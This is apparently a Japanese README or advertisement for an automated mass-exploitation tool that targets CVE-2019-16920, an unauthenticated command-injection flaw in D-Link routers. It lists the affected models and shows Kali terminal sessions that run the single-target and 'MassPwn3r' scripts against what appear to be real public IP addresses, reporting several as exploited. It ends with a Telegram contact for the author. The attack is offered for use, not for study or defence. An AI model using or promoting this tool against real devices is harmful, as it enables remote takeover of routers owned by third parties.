
自動化された大量悪用ツール。複数のD-LinkルーターにおけるCVE-2019-16920コマンドインジェクション脆弱性を対象とし、認証なしのリモートコード実行を可能にする。
脆弱性は、以下のD-Link製品の最新ファームウェアで発見されました。 DIR-655 DIR-866L DIR-652 DHP-1565
認証されていないリモートコード実行が、DIR-655C、DIR-866L、DIR-652、DHP-1565などのD-Link製品で発生します。この問題は、攻撃者が「PingTest」デバイス共通ゲートウェイインターフェースに任意の入力を送信すると発生し、コマンドインジェクションにつながる可能性があります。コマンドインジェクションのトリガーに成功した攻撃者は、システム全体を侵害できる可能性があります。その後、DIR-855L、DAP-1533、DIR-862L、DIR-615、DIR-835、DIR-825も影響を受けることが独立して判明しました。
root@kali:~# python3 CVE-2019-16920.py 195.208.166.41 8081 ls
[*]Sending payload
[*]Exploited!
root@kali:~#
root@kali:~# python3 CVE-2019-16920-MassPwn3r.py bots.txt 8081 id
[*]Exploiting: 195.208.166.41
[!]Unable to connect to host
[!]Unable to connect to host
[*]Exploiting: 83.243.166.37
[*]Exploiting: 74.95.133.33
[*]Exploiting: 97.89.64.118
[*]Exploiting: 66.162.68.154
[!]Unable to connect to host
[*]Exploiting: 72.47.152.161
[*]Exploiting: 97.93.250.209
[*]Exploiting: 183.207.196.64
root@kali:~#
Telegram:@eth_hacker0x18